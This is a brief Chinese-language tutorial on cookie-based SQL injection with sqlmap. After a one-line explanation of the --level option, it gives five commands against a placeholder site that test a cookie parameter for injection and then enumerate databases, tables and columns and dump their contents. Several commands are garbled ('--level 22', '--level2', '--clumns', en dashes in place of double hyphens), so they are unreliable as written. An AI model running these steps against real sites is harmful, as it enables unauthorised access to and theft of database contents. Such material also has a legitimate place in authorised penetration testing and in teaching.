说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!
1、判断是否可以注入
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --level 22、猜解数据库
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --dbs --level 2
3、猜解表
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 --tables --level2
4、猜解字段
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 –T 表名 --clumns --level2
5、猜解内容
Sqlmap –u http://www.xxx.com/cookie/test.asp --cookie id=1 –T 表名 -C 字段名 --dump --level2